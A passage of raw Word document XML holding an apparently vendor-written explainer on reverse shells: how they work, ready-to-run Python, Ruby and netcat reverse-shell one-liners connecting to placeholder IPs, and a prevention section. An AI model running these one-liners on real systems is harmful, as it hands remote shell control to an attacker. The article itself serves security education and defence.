          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Python is commonly used on production systems and therefore it may be an option for a reverse shell as well:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA94830" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE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lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.17.1",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F431934" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Ruby Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2AA979" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="375" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>While Ruby is not as common as the other languages, it also makes it possible to create a reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB448AC" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE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lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>ruby -rsocket -e 'exit if fork;c=TCPSocket.new("10.10.17.1","1337");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E54AD6D" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="375" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518DF840" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE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lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>ruby -rsocket -e'f=TCPSocket.open("10.0.17.1",1337).to_i;exec sprintf("/bin/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d",f,f,f)'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E799E4B" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Netcat Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABA846E" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="375" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Netcat is rarely available on production servers, but if all else fails, the attacker can try the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507739FD" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE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lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.0.0.1 1234 &gt;/tmp/f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F88A70" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>More Reverse Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E390E7" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="375" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>For an impressive list of reverse shell payloads, you can refer to the </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00195AE6">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="E31E25"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Reverse Shell Cheat Sheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> maintained by </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00195AE6">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="E31E25"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Swissky</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> on GitHub.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523AB9D2" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="525" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F78734" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="375" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>In general, a reverse shell on its own is not malicious and can also be used for legitimate purposes, for example, for remote server administration. If you don’t need to use reverse shells, you can try to limit the possibility to create them but it is very difficult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000AAE89" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>You can impose strict control of outgoing connections. However, this is only possible for very specialized servers. And there is nothing to stop the attacker from opening a listener on a common port such as 80. In such a case, all connections would have to be monitored for content as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D66CAD" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>You can disable most tools that make it possible to create a reverse shell, but again this is only possible for very specialized servers. As you can see above, reverse shells can be created using different tools and languages. Therefore, you may make it more difficult for the attacker, but not impossible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2113F773" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="375" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Even if you succeed in avoiding reverse shells, there are other methods that the attacker can use to establish control over the system. For example, in some cases, they may use </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00195AE6">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="E31E25"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>web shells</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> instead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1608CCA6" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="375" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Reverse shells on their own are always a result of some other kind of attack, for example, an </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00195AE6">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="E31E25"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>SQL Injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> attack. Therefore, the best way to avoid reverse shells is to protect against attacks that allow impostors to gain shell access in the first place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BE33D0" w14:textId="7CE99B21" w:rsidR="00A06BD3" w:rsidRDefault="00A06BD3"/>
    <w:p w14:paraId="5B75004C" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the local host. Attackers who successfully exploit a </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00195AE6">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="3E3E3E"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>remote command execution vulnerability</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> can use a reverse shell to obtain an interactive shell session on the target machine and continue their attack. A reverse shell (also called a connect-back shell) can also be the only way to gain remote shell access across a NAT or firewall. Let’s see how reverse shells work in practice and what you can do to prevent them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32993FC6" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C78AF20" wp14:editId="4CE34FC4">
            <wp:extent cx="5715000" cy="3003550"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1" name="Picture 1" descr="Understanding Reverse Sh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Reverse Shel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003550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C305271" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="750" w:after="450" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>How a Reverse Shell Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D785C8" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
